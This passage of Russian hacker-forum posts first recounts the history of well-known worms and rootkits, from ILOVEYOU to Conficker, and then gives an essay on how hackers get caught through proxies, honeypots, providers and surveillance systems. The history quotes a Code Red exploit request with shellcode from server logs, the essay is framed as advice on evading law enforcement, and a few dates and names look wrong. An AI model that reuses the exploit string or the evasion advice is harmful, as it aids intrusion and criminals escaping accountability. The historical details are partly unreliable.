автор заюзал не только в письмах. Для файлов целого ряда расширений, червь создавал свои копии, добавляя к их названию расширение .vbs. Если в папке был файл rulez.mp3, то тут же создавался rulez.mp3.vbs с телом червя — и так повсюду.<br />В основе другого способа распространения, который так же давал плоды, лежали скрипты для mIRC — самой распространенной программы для бешено популярных тогда IRC-чатов. Пользователям чата автоматически передавалась HTML-ка, предлагающая закачать некий ActiveX-элемент. Что находилось внутри, объяснять не надо, но поверь на слово: посмотреть, что прислал им хороший приятель, соглашались очень многие.<br />Первый случай активности Love Letter был зафиксирован 4 мая 2000 г., а уже через сутки им были частично или полностью поражены сети ЦРУ, NASA, Министерства энергетики, конгресса США, Пентагона, британской палаты общин и еще множества организаций. Ущерб, нанесенный червем в первые дни активности, был оценен в $5 миллионов. Офигительно? Виновника этого безобразия помог найти оставленный им автограф: «barok -loveletter(vbe) &lt; i hate go to school &gt; by: spyder / ispyder@mail.com / Manila,Philippines». Но в виду отсутствия местных законов за подобные преступления, никакой ответственности он не понес.</p> <p>а вот так выглядело письмо ILOVEYOU</p> <p>Code Red</p> <p>Из-за этого червя сайту Белого дома США в 2002 году пришлось поменять IP-адрес . Стартовавшего 13 июля 2001 года, Code Red интересовали виндовые машины с запущенным веб демоном IIS на борту и включенной системой индексирования. О существовании критической уязвимости, приводящей к переполнению буфера, в Microsoft знали задолго до появления вируса, а за месяц до эпидемии была опубликована заплатка. Впрочем, это не помешало запущенному 13 июля червю заразить за 6 следующих дней более 350 тысяч машин. Брешь в ISS позволяла легко выполнять на сервере удаленный код. Разработчики Code Red не сильно заморачивались и приделали эксплоит к простейшему сканеру, который работал «в лоб». Во время сканирования Code Red не проверял наличие IIS на новом компьютере-жертве, а тупо отправлял специально сформированные HTTP-запросы на сгенерированные случайно IP-адреса в надежде, что где-то на 80-порту окажется вожделенный IIS. Море запросов— огромный объем трафика. В итоге, оборудование попросту стало задыхаться от мусорных GET-запросов, которые генерировали ноды по всему мира. В логах Apache, на который, естественно, уязвимость IIS не распространялась, можно было обнаружить подобные строки:<br />GET /default.ida?NNNNNNNNNNNNNNNNNN<br />NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN<br />NNNNNNNNNNNNNNNNNNNNNNN%u9090%u685<br />8%ucbd3%u7801%u9090%u6858%ucbd3%u7<br />801%u9090%u6858%ucbd3%u7801%u9090%<br />u9090%u8190%u00c3%u0003%u8b00%u531<br />b%u53ff%u0078%u0000%u00=a HTTP/1.0<br />В процессе работы Code Red не использовал никаких временных или постоянных файлов. Червь уникален: он существовал либо в системной памяти зараженных компьютеров, либо в виде TCP/IP-пакета при пересылке на удаленные машины. Но наличие заразы на сервере обнаруживалось без всякого антивируса. Поскольку в памяти компьютера могли существовать сразу сотни активных процессов Code Red, то тормоза и лаги были неизбежны. Червь заменял содержимое страниц на зараженных серверах на сообщение: «HELLO! Welcome to <a href="http://www.worm.com" rel="nofollow" target="_blank">http://www.worm.com</a>! Hacked By Chinese!», но был избирателен и дефейсил только те системы, где в качестве основного языка был установлен английский.Через некоторое время, правда, дефейс снимался автоматически: видимо, разработчики не хотели раньше времени терять драгоценную ноду.<br />Между 20 и 28 числами месяца тело червя должно было начать DoS-атаку на несколько IP-адресов, один из которых принадлежал американскому Белому дому.<br />В августе этого же года начал распространяться новый червь Code Red II, код которого, несмотря на схожее название, был создан заново и предоставлял владельцам полный контроль над зараженными машинами, копируя файл cmd.exe в каталог \inetpub\scripts\ ISS-сервера. В отличие от оригинального Code Red, клон старался атаковать хосты в той же подсети и не допускал одновременного запуска себя на одной системе.</p> <p>Code Red дефейсил системы с английской локалью</p> <p>Nimda</p> <p>Запустившегося в сентябре 2001 года червя ну никак не могли не связать с деятельностью Алькайды, заодно рассказывая о мощных технологиях, применяемых в новой заразе. Но если присказки о терроризме были выдумкой журналистов, то очевидная продвинутость нового червя была на лицо. Фишка Nimda заключалась сразу в нескольких каналах распространения, благодаря которым ему удалось в считанные минуты распространиться по Сети. Разберемся по порядку.<br />1. Наибольший пробив был получен за счет эксплоита, который использовал уязвимость в Internet Explore’е, позволяющую автоматически запускать приаттаченный к письму файл. Прикрепленный к письму README.EXE (написаный, кстати, на С++) беспрепятственно запускался на машине при простом открытия письма, и комфортно начинал свое распространение. Причем, для поиска новых адресатов вирус кропотливо сканировал текстовые документы на жестком диске, а также запрашивал с помощью специальной MAPI-функции список адресатов с сервера Microsoft Exchange.<br />2. Другой способ распространения — расшаренные ресурсы в локалке. После сканирования всех доступных шар Nimda создавал там файлы с почтовыми сообщениями, имеющие расширение .EML и .NWS.Открытие таких файлов происходит в почтовой программе, что автоматически влекло за собой заражение, как если бы письмо просто пришло по почте.<br />3. Не могли забыть создатели и про дырявый IIS, уязвимость в котором уже использовали другие черви. Поэтому Nimda довольно эффективно пробивал майкросовский веб-демон с помощью уязвимости directory traversal. В случае заражения веб-сервера на нем случайным образом выбирались странички, откуда начиналась загрузка вируса посетителям.<br />4. И еще интересный ход — Nimda не стеснялся и активно использовал для распространения бекдоры, оставленные в системах червями Code Red II и sadmind/IIS.<br />Добавим, что Nimda имел опасный побочный эффект, который мог допустить утечку конфиденциальной информации с зараженных компьютеров. Червь добавлял пользователя под именем «Guest» в группу пользователей «Администраторы». Таким образом, обычные гости получали полный доступ к ресурсам компьютера. Более того, все локальные диски открывались через шары для полного доступа.<br />Автор этого вируса официально не найден, но в теле червя содержится строка, указывающая, что создатель из Китая: «Concept Virus(CV) V.5, Copyright(C)2001 R.P.China»</p> <p>разные способы заражения червя Nimda</p> <p>Slammer</p> <p>Незадачливые жители стран Северной Америки были сильно удивлены, когда 25 января многие банкоматы попросту перестали работать. Во всем мире со сбоями работали службы по заказу и резервированию авиабилетов, многие сервисы вообще не были доступны. Но набивший оскомину финансовый кризис тут вовсе не причем — это лишь всплеск активности червя Slammer. Активность впервые замечена в 12:30 по среднеатлантическому времени, а к 12:33 количество зараженных машин удваивалось каждые 8.5 секунд.<br />В основе червя лежала уязвимость в Microsoft SQL Server, концепция которой была представлена David Litchfield на конференции BlackHat. Отправляя на 1434 скомпрометированный пакет, вирус мог выполнить на удаленной машине произвольный код и, в свою очередь, продолжить распространение. По различным отчетам сообщается, что вирусу удалось заразить 75.000 машин за каких-то десять минут, — но как? Уязвимый модуль IIS, позволяющий приложениям автоматически обращаться к нужной базе данных, принимал запросы как раз по UDP, а тело вируса, составляющее всего 376 байт, отлично помещалось в один единственный UDP-пакет. В результате Slammer не использовал тормозной TCP, требующий постоянных квитков-подтверждений, а рассылал себя по ненадежному UDP со скоростью несколько десятков запросов в секунду! Несмотря на то, что патч для уязвимости был выпущен за 6 месяцев до эпидемии, а вирус никак не проявлял себя на зараженной машине, последствия от Slammer’а были колоссальными. Роутеры и маршрутизаторы на магистралях были настолько перегружены трафиком, что лавинообразно выбивали другу друга в конце концов отключив некоторые бэкбоны. Южная Корея была полностью отрублена от инета и находилась в таком состоянии почти 24 часа. Только представь: никакого интернета и мобильной связи с внешним миром для 27 миллионов человек. Забавно, что многие жертвы даже не знали, что на их машине установлена такая специфическая вещь, как SQL.</p> <p>сетевая активность Slammer'a</p> <p>Sasser</p> <p>Уж что-что, а окошко System Shutdown, инициированное NT AUTHORITY\SYSTEM с обратным отсчетом и сообщением о принудительной перезагрузке компьютера видел почти каждый — годом ранее, во время эпидемии Blaster’а, либо же в 2004, когда стал бушевать во многом похожий на него Sasser. Принципиальная разница червей в том, что они используют критические уязвимости в разных службах. Для размножения Sasser использует баг переполнения буфера в службе Local Security Authority Subsystem Service (LSAS) — отсюда и название червя. Написанное на С++ тело Sasser в первоначальной версии открывает 128 параллельных потоков, и, используя специальный алгоритм по генерации IP-адресов, пытается найти системы с незащищенным 445 портом и уязвимым сервисом. Сплоит работал на «ура», правда, приводил к ошибке на системе пользователя. Sasser открывал на 9997 порту шелл, через который далее и заливалось все необходимое. Само тело червя без лишнего геморроя просто передавалось по протоколу через FTP, причем сервер также открывался на зараженных компьютерах на 5554 порту. Как часто бывает, шелл-код сплоита отличается от системы к системе, поэтому Sasser предварительно проверял версии удаленной системы, чтобы выбрать правильный набор параметров для атаки.<br />Оригинальная версия червя Sasser распространялась достаточно медленно, но через несколько дней в Сети были выпущены модификации, распространяющиеся гораздо быстрее. К этому моменту число зараженных машин измерялось сотнями тысяч, а в пике эпидемии речь шла о миллионах. В Финляндии были отменены рейсы местной авиакомпании, во многих странах закрыты некоторые отделения крупнейших банков. Автором заразы оказался 18-летний немецкий студент Свен Яшан, хотя изначально разрабатывался «русский след». Юного вредителя заложил кто-то из своих, позарившись на обещанное Microsoft’ом награждение в 250.000 баксов. Помимо Sasser, на компьютере парнишки нашли еще и многочисленные модификации червя Netsky.</p> <p>ошибка системы после заражения Sasser'om</p> <p>Sony rootkit</p> <p>Забавный факт: это единственный руткит, который распространялся легально! Win32/Rootkit.XCP, или «sony rootkit», является частью системы защиты аудио-CD,выпускаемых Sony BMG. Растроенная всепоглощающим пиратством компания решила бороться с нелегальным копированием с помощью DRM-компонентов (Digital Rights Management), а в попытке скрыть их присутствие в системе обратилась в компанию First 4 Internet, чтобы те написали маскирующий руткит. В итоге, система защиты дисков вместе с руткитом стала инсталлироваться на компьютер пользователя автоматически, когда в привод вставляется защищенный компакт диск. После установки, в системе появлялись два новых сервиса, которые и выполняли все функции. Установленный драйвер $sys$aries (aries.sys) скрывает все файлы и ключи в реестре, которые начинаются с «$sys$» посредством перехвата нативных API-функций. Win32/Rootkit.XCP отслеживает обращения к System Service Table (SST) и перехватывает обращения к функциям: NtCreateFile, NtEnumerateKey, NtOpenKey, NtQueryDirectoryFile, NtQuerySystemInformation. В результате удается скрыть присутствие ключей в реестре, папок, файлов и процессов.<br />Ты спросишь: а в чем, собственно, трабл? Ну, скрывает этот руткит работу нужных ему компонентов, что с того? Очень просто. Сразу после появления руткита, Марк Руссинович в своем блоге рассказал о многочисленных брешах в собственной защите программы. И был прав: очень скоро механизм, предназначенный для сокрытия файлов и процессов, быстро приспособили для своих нужд кодеры вирусов. Более того, распространение этого ноу-хао само по себе приводило к нестабильности системы, зависанию компьютера и потере данных из-за кривых драйверов, установленных в систему. И даже тогда, когда Sony выпустила специальную тулзу, избавиться от это дряни полностью было очень и очень затруднительно.</p> <p>BSOD из-за корявых драйверов Sony rootkit</p> <p>Warezov</p> <p>На дворе — 2006 год, только вот ушастые пользователи по-прежнему открывают все вложения в письмах, а программно им мало кто запрещает это делать. Результат? Огромный ботнет Warezov (он же Stration), который авторы сумели собрать за счет одноименного червя, рассылаемого по email. Никаких сплоитов и уязвимостей, — социальная инженерия и людская тупость. И ведь повсю трубят: «Не открывай вложений» — так ведь все равно кликают. Особенность червя Warezov — в огромном количестве вариаций, которые появлялись, как грибы после дождя. Был момент, когда новые модификации появлялись чуть ли не раз в 30 минут. Даже с обновленными антивирусными базами многие юзеры оставались не у дел. Впоследствии, когда на веб-серверах глобально начали вычищать все письма со зловредными аттачами, модификации перекинулись на IM-сети. А один из вариантов Warezov стал первым червем, который распространялся через Skype!<br />Как и подобает трою для ботнета, тело Warezov позволяло владельцам загрузить на компьютер любую заразу. Червь содержит в себе список жестко прописанных URL-адресов (что, конечно, минус), которые он проверяет на наличие файлов. В случае если по какому-либо из этих адресов будет размещен файл, он загрузится в систему и запустится. Основной модуль Warezov способен завершать различные процессы, а также останавливать и удалять службы антивирусных программ и персональных брандмауэров. Для организации рассылки червь использует собственный SMTP-сервер. Главное использование ботнета — это, конечно же, спам. Однако многие ноды служили для хостинга так называемых fast-flux платформ, позволяя спамерам прятать настоящее расположение их спамерских сайтов за IP-адресом жертвы. IP менялся настолько часто, что его невозможно было прикрыть. Warezov достигал этого двумя средствами: во-первых, reverse HTTP proxy, которая получала контент с настоящего (скрываемого) сайта, а также DNS-сервера, на котором специальная версия Bind под Windows меняла записи по нужному алгоритму.</p> <p>временный файл Warezov</p> <p>Storm</p> <p>Ботнет, созданный с помощью червя Storm, можно смело назвать произведением искуства. Децентрализованная P2P-сеть, в которой большинство хостов сидит тихо и ждет указаний. Доменные имена разрешаются в постоянно меняющиеся IP-адреса (опять же fast-flux domains). Часть кода червя — полиморфная. В пике — более миллиона инфицированных хостов. Как это удалось?<br />Эпидемия червя началась с компьютеров в Европе и Соединенных Штатах 19 января 2008 года, когда, прикрываясь темой урагана в Европе, пользователям повалились письма с предложением открыть вложенный файл с названиями Full Clip.exe, Full Story.exe, Read More.exe или Video.exe.<br />Все попавшиеся на удочку машины автоматически объединялись в ботнет, но в отличие от других сетей, он не использовал специальный управляющий сервер, доступ к которому легко перекрыть. Принцип управления Storm больше напоминает пиринговую сеть, в которой зараженные ноды подключаются к своему управляющему хосту (он руководит обычно 30-45 зомби), а хосты взаимодействуют между друг другом. Причем роль хоста в случае необходимости может занять любая из нод. Вся сеть устроена так, что полного списка нодов нет ни у кого, поэтому точные размеры ботнета так и остались загадкой. По разным подсчетам, он варьировался от одного до нескольких миллионов машин.<br />Помимо функций по работе с ботнетом, Storm устанавливает в системе руткит: Win32.agent.dh, посредством которого держатели ботнета могли стащить любую конфиденциальную инфу, рассылать спам и устраивать мощные DDoS-атаки.</p> <p>техника fast-flux в картинках</p> <p>Merboot</p> <p>Загрузочные вирусы, о которых все благополучно успели забыть, возвращаются. В 2005 году на хакерской конференции Black Hat специалисты eEye Digital Security продемонстрировали концепт так называемого буткита, размещающего в загрузочном секторе диска код, который перехватывает загрузку ядра Windows и запускает бэкдор с возможностью удаленного управления по локальной сети. Презентация прошла на ура, а в 2008 году, после длительного затишья в области руткитов, выстрелил Mebroot. Новый троян использовал представленную еще в 2005 году идею и размещал свое тело в бут-секторе диска, после чего вносил модификации в ядро Винды, которые затрудняли обнаружение вредоносного кода антивирусами. Подцепить заразу мог кто угодно: компы заражались через свежие сплоиты с популярных сайтов. Вредоносный код сначала изменяет MBR (главная загрузочная запись), записывает руткит-части в сектора диска, извлекает из себя и устанавливает бэкдор в Windows, после чего самоудаляется. В результате заражения, в MBR размещаются инструкции, передающие управление основной части руткита, размещенного в разных секторах жесткого диска. Именно эта часть, уже после загрузки системы, перехватывает API-функции и скрывает зараженный MBR. Кроме традиционных функций по сокрытию своего присутствия в системе, вредоносный код устанавливает в Windows бэкдор, который занимается кражей банковских аккаунтов.</p> <p>с Merboot'om до сих пор справляются далеко не все антивирусы</p> <p>Downadup</p> <p>Червя, нашумевшего в январе, называют по-разному: Downadup, Conficker, Kido. Важно одно: новой малваре за несколько дней удалось заразить миллионы компьютеров, и собранный ботнет функционирует до сих пор. Разработчикам удалось лихо диверсифицировать способы распространения, объединив в одном черве сразу несколько успешных методик. Самый эффективный способ — приватный сплоит, использующий непропатченную систему с уязвимостью переполнения буфера MS08-067 в сервисе «Сервер» (патч вышел еще в октябре). Для этого червь отсылает удаленной машине специальным образом сформированный RPC- запрос, вызывающий переполнение буфера при вызове функции wcscpy_s в библиотеке netapi32.dll. На компьютере запускается специальный код-загрузчик, который скачивает с уже зараженной машины исполняемый файл червя и запускает его.<br />Кроме этого, червь отлично тиражирует себя через «Сетевое окружение», перебирая пароль администратора к системной шаре ADMIN$. А давно известный способ распространения через флешки претерпел изменения: в результате обфускации Autorun.inf (разработчики просто добавили в файл кучу мусора) удалось обмануть многие сигнатурные антивирусы. Несколько способов = максимальный эффект! Другая ключевая особенность заключается в том, как червь скачивает на зараженную машину трояна (для дальнейшей рассылки вируса, DDoS’а и т.д.). Разработчики отказались от размещения файлов на каком-то жестко зафиксированном серваке. Вместо этого код червя получает на нескольких популярных ресурсах текущую дату и по ней генерирует список из 250 доменов, используя специальный алгоритм. Задача хозяев ботнета — заблаговременно эти домены зарегистрировать и разместить там файлы для загрузки. Противостоять этому не столько сложно, сколько дорого.<br />Перехватывая API-вызовы, отвечающие за обращение к DNS, заразе долгое время удавалось сдерживать антивирусы, которые банально не могли обновиться, обращаясь к заблокированным доменам, содержащим слова kaspersky, nod, symantec, microsoft и т.д.</p> <p>разные способы распространения червя Downadup</p> mybb@mybb.ru (-=PRELIATUS=-) Fri, 01 Apr 2011 17:47:49 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=62#p62 http://indogohacker.forumbb.ru/viewtopic.php?pid=61#p61 <p>Не проходит буквально ни одной недели, чтобы в Интернет-новостях не появилось сообщение об успешном задержании спецслужбами очередного компьютерного преступника. Причем, чаще всего речь идет не о бестолковых рассыльщиках троянов, а о достаточно грамотных и, если можно так сказать, профессиональных хакерах, наверняка, уделявших собственной безопасности не последнее место. Достаточно упомянуть Линн Хтуна из знаменитой группы «Fluffi Bunni» («Пушистый кролик») и членов интернациональной кракерской организация DrinkOrDie.</p> <p>Казалось бы, времена Митника давно прошли и пора бы уже сделать определенные выводы, касающиеся собственной безопасности. Так в чем же дело? За счет каких механизмов спецслужбам удается столь эффективно отслеживать и «уничтожать» информационных «преступников»? В каких лабиринтах мировой паутины затаилась скрытая угроза? Чего следует опасаться хакеру? Об этом сегодня мы и поговорим. Я детально проанализировал возможные ошибки и пути отлова хакеров на сегодняшний момент, результаты моих «исследований» лежат пред тобой. Но не исключено, что в чем-то я могу сильно ошибаться, т. к. точное заключение может дать только эксперт, который непосредственно «крутится» в сфере государственной безопасности, но от них мы никогда ни чего не узнаем. </p> <p>Неуязвимость — это иллюзия</p> <p>Совершив не один десяток взломов и не попавшись в руки правосудия у многих молодых хакеров возникает иллюзия собственной супер секьюрной безопасности. На самом деле, это объясняется только тем, что ты еще пока не понадобился «нужным» людям. Спецслужбы не будут предпринимать ни каких действий, пока не заподозрят в твоих деяниях угрозу национальной безопасности или пока не увидят у себя на столе заявление от пострадавших (не исключено также, что ты уже «ходишь» под колпаком, просто не догадываешься об этом ). Обычно, хакеру играет на руку, что большинство отхаканных не обращается «куда следует», а предпочитают промолчать и забыть о взломе. Например, кому охота связываться с федералами из-за какого-то там дефейса, или какой прикол админу сообщать начальству, что на его серверах хакеры пооткрывали себе шеллы — ему же в первую очередь и влетит, поэтому он по-тихому залатает дыры и сделает вид, что ничего не было. Многие компании не хотят заводить дело, т. к. бояться, что информация о взломе станет доступна общественности, а это может принести дополнительные убытки из-за подпорченной репутации. Нельзя также исключать наличие организаций, которые вообще ни при каких обстоятельствах не будут связываться со спецслужбами, т. к. сами имеют определенные грешки. Но так бывает не всегда и даже такое, по сути, мелкое хулиганство как дефейс может стать причиной преследования спецслужб. Например, действия группы Fluffi Bunni привлекли внимание ФБР после терактов 11 сентября, когда на множестве сайтов появились лозунги «Fluffi Bunni Goes Jihad» (&quot;пушистый кролик идёт на джихад&quot;). Это было расценено как протест против американской глобальной кампании по борьбе с терроризмом, т. е. по сути членов группы уровняли с террористами (а это уже не шуточные сроки).<br />Таким образом, можно выделить особую категорию хакерских проделок, которые ПОЧТИ всегда становятся работой спецслужб — это воровство, вымогательство, шпионаж и «наезд» на государственные сервера. Людей в штатском может привлечь и просто высокая хакерская активность, например, огромный список дефейсов на «хакерском» сайте. Обычно, общение со спецслужбами, в этом случае, ограничивается без инициативным обыском в квартире хакера или разговор «по душам» с ярко светящей в глаза лампой (немало таких историй можно почитать на хакерских сайтах, например, здесь: <a href="http://hangup.pisem.net" rel="nofollow" target="_blank">http://hangup.pisem.net</a>, статья &quot;Скучный шмон&quot; и пр.). Надо полагать, что цель таких мер связана с профилактикой, т. е. показать хакеру, что он находится под контролем и пресечь возможные будущие, более тяжкие преступления. Если это так, то нужно только снять защитный экран с монитора перед нашими родными спецслужбами за заботу о подрастающем поколении. </p> <p>Вывод первый: профессионалы никогда не чувствуют себя в безопасности, паранойя — вечный спутник хакера.</p> <p>Не существует &quot;своих&quot; и &quot;чужих&quot; спецслужб</p> <p>Среди многих отечественных представителей андеграунда существует одно ошибочное убеждение, что если не трогать российские сервера, то за собственную безопасность можно вообще не бояться. Да, действительно, неурегулированные законы об экстрадиции хакеров из России, в большинстве случаев позволяют отечественным спецслужбам игнорировать просьбы о сотрудничестве своих зарубежных коллег и даже вступать с ними в конфронтацию. Широко известна история, когда следователь Игорь Ткач из Управления ФСБ чуть не возбудил уголовное дело против агента ФБР Майкла Шулера после ареста последними двух Челябинских хакеров Алексея Горшкова и Василия Иванова (с деталями дела можно ознакомиться в Интернете, в т. ч. и на нашем сайте). Но время не стоит на месте и однажды все может измениться, и тогда тебе напомнят все твои грешки, к тому же ты уже сейчас лишаешь себя возможности безбоязненного выезда за рубеж (не обязательно в США), т. к. тебя там уже могут ждать.&#160; Пример тому, недавняя история с 25-летним украинским хакером, который, был пойман в Бангкоке при содействии Таиландских и Американских спецслужб. Большинство хакеров xUSSR попадают в руки правосудия именно за пределами своей родины (примеров тому можно приводить много).</p> <p>Вывод второй: профессионалы не проводят грань между российскими и зарубежными спецслужбами — спецслужбы всех стран одинаково опасны для хакера. Практика показывает, что иностранные спецслужбы представляют собой большую угрозу, т. к. уж очень сильно «там» не любят отечественных хакеров.</p> <p>Схема хакерской атаки.</p> <p>Рассмотрим типичную схему хакерской атаки (взлом) в Интернете</p> <p>Хакер выходит в сеть через обычного провайдера, затем через цепочку анонимных proxy к удаленному шеллу и уже с шелла проводит атаку. Шеллом обычно является захваченная (поrootанная) машина или скарженная на хостинге торгующего шеллами. В приведенном случае, задача шелла не анонимность, а обеспечение ресурсами, т. к. шелл обычно располагается на мощном сервере с приличным каналом. Конечно, эта не единственная схема: цепочку анонимных прокси может заменить цепочка из одних только шеллов или шелл, в схеме, вообще может отсутствовать, также прокси-сервера могут идти только от удаленного шелла до цели (это если хакер хочет сохранить шелл) и т. п. Непрофессионалы вообще ограничиваются единственным прокси. Кроме того, хакер может выходить в Интернет через локальную сеть (например, из Интернет-кафе). Но в данном контексте это все не существенно и приведенного рисунка достаточно чтобы рассмотреть большинство опасностей и слабых мест, которые могут подстерегать хакера в плане собственной безопасности.</p> <p>Не все анонимные прокси одинаково анонимны</p> <p>Начнем с середины — с proxy-серверов. Частенько можно услышать мнение, что если сидеть за цепочкой proxy, которые будут расположены в разных частях света, то это обеспечит практически 100% анонимность. При этом правда отмечается, что прокси имеют свойства вести логи и по логам, в принципе, можно восстановить всю цепочку. Уже одно это утверждение не дает 100% анонимности, т. к. если распутыванием займутся серьезные люди, то довести дело до конца у них есть все шансы, даже самых несговорчивых админов можно купить, запугать, хакнуть, наконец, сам proxy-сервер и выудить логи. Здесь главное время, т. к. логи имеют свойство удаляться, а прокси-сервера бесследно исчезать. Но это было бы пол беды, т. к. по неподтвержденным слухам большинство анонимных proxy принадлежат самим спецслужбам (!). Это логично, т. к. если кто-то хочет анонимности, значит, ему есть что скрывать, а если есть что скрывать, значит, это либо террорист, либо хакер (а для спецслужб некоторых стран это вообще одни и те же понятия). Отсюда должно быть понятно стремление федералов контролировать эти самые прокси-сервера. Да и как объяснить ТАКОЕ количество анонимных прокси в Интернете — ведь хоть убей не пойму, какая может быть выгода от этого их хозяевам. Если бесплатные почтовые службы или поисковые системы еще могут жить за счет рекламы, то кроме IP-адреса прокси-сервера, клиент совершенно ни чего не знает о последнем (если конечно proxy не анонимайзер). Кстати, этому есть и косвенные подтверждения, ни однократно были замечены случаи, когда анонимный прокси-сервер делал попытку подключиться к клиенту, например, на 139 порт (файервол это отлично фиксирует). Как ты думаешь, что может понадобиться АНОНИМНОМУ ПРОКСИ-СЕРВЕРУ на 139 порту?! <br />На сайте <a href="http://w4news.host.sk/safety.htm" rel="nofollow" target="_blank">http://w4news.host.sk/safety.htm</a> можно прочитать следующую фразу:<br />«Возможно, proxy контролируются спецслужбами, поэтому рекомендуем использовать только те, которые расположены за пределами России (СНГ) и стран НАТО». Однако этот совет не может быть хорошим. Ведь, что мешает создать разветвленную сеть «анонимных» proxy-серверов по всему миру, например, российским спецслужбам? Ничего. Причем прокси-сервера можно располагать прямо в посольствах (наверняка там тусят свои админы). А, учитывая, что постоянное подключение к Интернету имеют около 140 стран, то создать рассредоточенную сеть обойдется в совсем небольшие деньги даже для России, а про USA я вообще молчу. А если эти прокси-сервера еще к тому же будут иметь приличную скорость и все возможности, типа SOCKS5? Ведь не секрет, что большинство хакеров отбирают proxy по скорости. Возможно также, что сеть прокси-серверов совместно используется спецслужбами всех стран, что-то вроде Интерпола. Но сдается мне, что, все-таки, большинство «анонимных» прокси-серверов принадлежат одной великой супер-державе, догадайся какой?&#160; Поэтому, наверное, не стоит рассла***ться, если прокси из твоей цепочки расположены в Нигерии, Японии, Финляндии и т. д., т. к. вполне может случиться так, что они будут принадлежать одной спецслужбе.</p> <p>Даже если в цепочку попадает сервер, не принадлежащий им, то это не проблема, т. к. достаточно выяснить с какого из своих серверов к нему могло осуществляться подключение. Конечно, если в цепочке окажутся идущие подряд два и более чужих прокси-сервера, то тут придется договариваться с их админами (как это может делаться, смотри выше). Кстати, возможно именно контролирование большинства прокси в Интернете позволяет спецслужбам делать в считанные дни официальные заявления, о том, из какой страны осуществлялась хакерская атака или откуда пошло распространение вируса и т. д., причем вплоть до таких экзотических стран как Филиппины. Возможно также, что подконтрольные прокси в странах НАТО входят в систему Эшелон.</p> <p>Эшелон — американская сеть глобального электронного шпионажа. Эшелон может перехватывать информацию, передаваемую практически по любым каналам связи (спутниковым, цифровым) в любой точке планеты. Источниками информации служат Интернет, электронная почта, телефон, факс, телекс. Эшелон — включает в себя более ста спутников-шпионов, большое количество суперсовременных и мощных компьютеров, множество наземных станций, расположенных по всему миру, на которых работают десятки тысяч сотрудников — программисты, криптологи, математики, лингвисты... Принцип работы системы Эшелон приблизительно следующий: каналы связи постоянно сканируются сверхмощными компьютерами, если проходящее сообщение содержит ключевое слово, выражение или тембр голоса (например, голос Бин Ладена), которое входит в так называемый словарь Эшелона, то сообщение записывается. Словарь Эшелона содержит огромное количество ключевых «слов» на многих языках мира и постоянно обновляется.</p> <p>Профессионалы не доверяют прокси.<br />Именно из-за недоверия к анонимным прокси некоторые «продвинутые» хакеры предпочитают заменять их цепочкой шеллов. Однако и шеллы таят в себе немалые опасности. Если ты слышал о проекте Honeynet, то должен был уже давно понять, то, что я сейчас хочу сказать.</p> <p>Что такое Honeynet?<br />Honeynet — сеть машин, специально предоставленная для взлома, для т. н. черных шляп, с целью анализа и изучения их техники. Сайт проекта: wwwhoneynet.org (на bugtraq.ru можно почитать некоторые переводы). Кроме того, с теми же целями используются и отдельные машины, которые называют honeypots.</p> <p>Проекты Honeynet поддерживаются в основном энтузиастами, однако, было бы наивно полагать, что если это пришло в голову обычным специалистам по безопасности, то не могло придти в голову спецслужбам, которые получают деньги за изобретение подобных штучек. Вообще, подобная тактика с «подсадными утками» является коронным приемом федералов не только в сети. Главная трабла для хакера в том, что очень сложно отличить, является ли используемый им шелл медовым горшочком или полноценным шеллом. Так, в Honeynet предусмотрен даже случай захвата или отключения хакером отдельного сервера логов (syslog-сервера). Причем, не имеет значения, был ли захвачен шелл нестандартным способом или через поисковик по известной баге, напомню, что Honeynet строится на стандартных системах без всякого намека на снижение безопасности. Единственное, что может отличать настоящий шелл от медового горшка это ограничение на количество исходящих соединений (в Honeynet предлагается разрешение в 5-10 соединений), это делается с целью защиты от использования шелла для сканирования других систем, проведения DoS и т. д., хотя, в принципе, такие ограничения могут присутствовать и на обычной машине. Скарженному шеллу доверять не менее опасно, т. к., во-первых, неизвестно под чьим контролем находится хостинг, во-вторых, все действия могут логгироваться. Фейковые шеллы могут нести и косвенную опасность. Например, если в IRC у одного из участников установлен BNC на подобном шелле, то спецслужбам не составит особого труда читать все сообщения в чате, а значит, все участники канала попадают под удар (об этом, кстати, забавно написано в одном из материалов Honeynet).</p> <p>Подконтрольные провайдеры.</p> <p>В большинстве случаев спецслужбам удается установить IP-адрес хакера, но это ничего не значит, т. к. главная цель — узнать ФИО «преступника» и возможно дом. адрес. Здесь все упирается в провайдера, т. к. только провайдер может сказать, кому принадлежит IP, а в случае с DialUP — с какого телефона осуществлялось подключение. Если хакер находится в России, то российским спецслужбам в этом плане значительно проще (практически все отечественные провайдеры находятся под контролем российских спецслужб). Но не нужно считать, что иностранным спецслужбам вообще ни как не удастся установить твою личность. Если совершенный тобой хак будет достаточно серьезным, то не исключено, что спецслужбам обоих сторон удастся договориться. Если нет, то тебя будут вычислять по косвенным признакам. Например, если после совершенного взлома, ты, пользуясь одной и той же цепочкой прокси, заказываешь себе домой на amazon.com какой-нибудь стафф, то, в случае, если дело ведут американские спецслужбы, им не составит ни какого труда «надавить» на админов магазина, с требованием выдать твой адрес (в свете 11 сентября это вообще не проблема, достаточно объявить тебя террористом). Короче, пока в Интернете есть хоть немного личной информации о тебе, ее могут раскопать, способов для этого много и спецслужбы ими должны хорошо владеть (не забывай, что вполне реально хакнуть и самого провайдера). Не удивляйся тогда, если в аэропорту какого-нибудь Дублина к тебе подойдут люди в черном, наденут наручники и зачитают (или запинают) твои права. </p> <p>Что такое СОРМ?</p> <p>СОРМ расшифровывается как «система оперативно-розыскных мероприятий», подразделяется на две системы: СОРМ-1 и СОРМ-2. Первая предназначена для контроля телефонной связи, вторая анализирует Интернет-трафик. В соответствии с документами, Интернет-провайдер на свои деньги был обязан установить оборудование, программы и выделенную линию для местного отделения ФСБ, а также провести обучение сотрудников. Все это позволяет последним отслеживать, перехватывать и прерывать связь любого клиента этого провайдера. На данный момент практически все российские провайдеры провели данные работы. Принцип функционирования СОРМ-2 похож на принцип работы Эшелона, т. е. подобным образом происходит обработка и накопление информации по ключевым словам. Системы подобные СОРМ существуют во многих других странах, например, в США — это Carnivore. Более подробную информацию об оборудовании и принципах работы СОРМ, можно посмотреть, например, здесь:http://www.loniis.ru:8101/RUS/produc.../sorm2001.zip.</p> <p>Если ты уже скомпрометирован, то не составит особого труда настроить эту систему на постоянное слежение за тобой. Здесь хочу отметить: меня просто умиляют люди, которые пересылают в открытом виде или в простых архивах — троянов, вирей, червей и прочий вредоносный стафф. Сейчас многие провайдеры (про бесплатные почтовые службы я 